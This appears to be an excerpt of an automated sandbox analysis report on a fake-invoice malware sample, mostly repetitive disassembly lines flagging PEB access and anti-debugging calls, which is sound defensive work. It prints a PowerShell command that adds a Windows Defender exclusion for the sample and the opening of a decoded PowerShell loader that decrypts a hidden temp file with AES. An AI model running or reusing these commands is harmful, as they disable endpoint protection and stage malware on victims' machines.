            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DC700 mov eax, dword ptr fs:[00000030h]14_2_053DC700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A8770 mov eax, dword ptr fs:[00000030h]14_2_053A8770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0770 mov eax, dword ptr fs:[00000030h]14_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B765 mov eax, dword ptr fs:[00000030h]14_2_0539B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B765 mov eax, dword ptr fs:[00000030h]14_2_0539B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B765 mov eax, dword ptr fs:[00000030h]14_2_0539B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B765 mov eax, dword ptr fs:[00000030h]14_2_0539B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A0750 mov eax, dword ptr fs:[00000030h]14_2_053A0750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545F72E mov eax, dword ptr fs:[00000030h]14_2_0545F72E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546972B mov eax, dword ptr fs:[00000030h]14_2_0546972B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2750 mov eax, dword ptr fs:[00000030h]14_2_053E2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E2750 mov eax, dword ptr fs:[00000030h]14_2_053E2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D674D mov esi, dword ptr fs:[00000030h]14_2_053D674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D674D mov eax, dword ptr fs:[00000030h]14_2_053D674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D674D mov eax, dword ptr fs:[00000030h]14_2_053D674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541C730 mov eax, dword ptr fs:[00000030h]14_2_0541C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B3740 mov eax, dword ptr fs:[00000030h]14_2_053B3740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B3740 mov eax, dword ptr fs:[00000030h]14_2_053B3740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B3740 mov eax, dword ptr fs:[00000030h]14_2_053B3740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547B73C mov eax, dword ptr fs:[00000030h]14_2_0547B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547B73C mov eax, dword ptr fs:[00000030h]14_2_0547B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547B73C mov eax, dword ptr fs:[00000030h]14_2_0547B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547B73C mov eax, dword ptr fs:[00000030h]14_2_0547B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054207C3 mov eax, dword ptr fs:[00000030h]14_2_054207C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F7BA mov eax, dword ptr fs:[00000030h]14_2_0539F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CD7B0 mov eax, dword ptr fs:[00000030h]14_2_053CD7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A07AF mov eax, dword ptr fs:[00000030h]14_2_053A07AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A47FB mov eax, dword ptr fs:[00000030h]14_2_053A47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A47FB mov eax, dword ptr fs:[00000030h]14_2_053A47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545F78A mov eax, dword ptr fs:[00000030h]14_2_0545F78A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C27ED mov eax, dword ptr fs:[00000030h]14_2_053C27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C27ED mov eax, dword ptr fs:[00000030h]14_2_053C27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C27ED mov eax, dword ptr fs:[00000030h]14_2_053C27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AD7E0 mov ecx, dword ptr fs:[00000030h]14_2_053AD7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054297A9 mov eax, dword ptr fs:[00000030h]14_2_054297A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542F7AF mov eax, dword ptr fs:[00000030h]14_2_0542F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542F7AF mov eax, dword ptr fs:[00000030h]14_2_0542F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542F7AF mov eax, dword ptr fs:[00000030h]14_2_0542F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542F7AF mov eax, dword ptr fs:[00000030h]14_2_0542F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0542F7AF mov eax, dword ptr fs:[00000030h]14_2_0542F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054737B6 mov eax, dword ptr fs:[00000030h]14_2_054737B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AC7C0 mov eax, dword ptr fs:[00000030h]14_2_053AC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A57C0 mov eax, dword ptr fs:[00000030h]14_2_053A57C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A57C0 mov eax, dword ptr fs:[00000030h]14_2_053A57C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A57C0 mov eax, dword ptr fs:[00000030h]14_2_053A57C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A262C mov eax, dword ptr fs:[00000030h]14_2_053A262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BE627 mov eax, dword ptr fs:[00000030h]14_2_053BE627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D6620 mov eax, dword ptr fs:[00000030h]14_2_053D6620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D8620 mov eax, dword ptr fs:[00000030h]14_2_053D8620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0539F626 mov eax, dword ptr fs:[00000030h]  (x9)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053E2619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0546866E mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053A3616 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053B260B mov eax, dword ptr fs:[00000030h]  (x7)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053D1607 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053DF603 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0541E609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053D2674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053DA660 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053D9660 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05475636 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053BC640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0545F6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_054616CC mov eax, dword ptr fs:[00000030h]  (x4)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053976B2 mov eax, dword ptr fs:[00000030h]  (x3)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053D66B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0539D6AA mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053DC6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053A4690 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_054336EE mov eax, dword ptr fs:[00000030h]  (x6)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0541E6F2 mov eax, dword ptr fs:[00000030h]  (x4)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_054206F1 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0545D6F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0542368C mov eax, dword ptr fs:[00000030h]  (x4)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053D36EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053CD6E0 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053D16CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053AB6C0 mov eax, dword ptr fs:[00000030h]  (x6)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053DA6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053DA6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05434144 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05434144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05434144 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053A1131 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0539B136 mov eax, dword ptr fs:[00000030h]  (x4)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05475152 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053D0124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05439179 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0539F172 mov eax, dword ptr fs:[00000030h]  (x21)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05460115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0544A118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0544A118 mov eax, dword ptr fs:[00000030h]  (x3)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053A7152 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053A6154 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0539C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05399148 mov eax, dword ptr fs:[00000030h]  (x4)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_054661C3 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053BB1B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_054751CB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0541E1D0 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0541E1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0541E1D0 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_054761E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0539A197 mov eax, dword ptr fs:[00000030h]  (x3)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053F7190 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053E0185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053D01F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0545C188 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053C51EF mov eax, dword ptr fs:[00000030h]  (x13)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053A51ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0542019F mov eax, dword ptr fs:[00000030h]  (x4)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_054511A4 mov eax, dword ptr fs:[00000030h]  (x4)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053DD1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053DD1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0539A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0539C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0544705E mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0544705E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05475060 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0542106E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053BE016 mov eax, dword ptr fs:[00000030h]  (x4)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0541D070 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053B1070 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053B1070 mov eax, dword ptr fs:[00000030h]  (x11)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053CC073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053A2050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053CB052 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0546903E mov eax, dword ptr fs:[00000030h]  (x4)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0541D0C0 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_054220DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_054750D9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053D909C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053A5096 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053CD090 mov eax, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053A208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0539D08D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0539C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053E20F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053A80E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053C50E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053C50E4 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_0539A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053C90DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053B70C0 mov ecx, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053B70C0 mov ecx, dword ptr fs:[00000030h]  (x2)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053B70C0 mov eax, dword ptr fs:[00000030h]  (x12)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_054660B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_054660B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05475341 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05397330 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]  (x9)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05422349 mov eax, dword ptr fs:[00000030h]14_2_05422349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546A352 mov eax, dword ptr fs:[00000030h]14_2_0546A352
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF734101404 GetProcessHeap,6_2_00007FF734101404
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340E7EF4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7340E7EF4
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340EE0B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7340EE0B0
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340E809C SetUnhandledExceptionFilter,6_2_00007FF7340E809C
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340E8108 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF7340E8108

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force
            Source: C:\Users\user\Desktop\Factura (3).exe Process created: Base64 decoded (UTF-16LE script, identifiers as in the original):
                [System.Threading.Thread]::Sleep(5000)
                $ВременнаяПапка = [System.IO.Path]::GetTempPath()
                $Шаблон = 'file-*.putik'
                $ПоследнийФайл = Get-ChildItem -Path $ВременнаяПапка -Filter $Шаблон | Sort-Object LastWriteTime -Descending | Select-Object -First 1
                function Расшифровать {
                    param (
                        [byte[]]$Ключ,
                        [byte[]]$ИнициализирующийВектор,
                        [byte[]]$Данные
                    )
                    $Шифратор = [System.Security.Cryptography.Aes]::Create()
                    $Шифратор.Mode = [System.Security.Cryptography.CipherMode]::CBC
                    $Шифратор.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
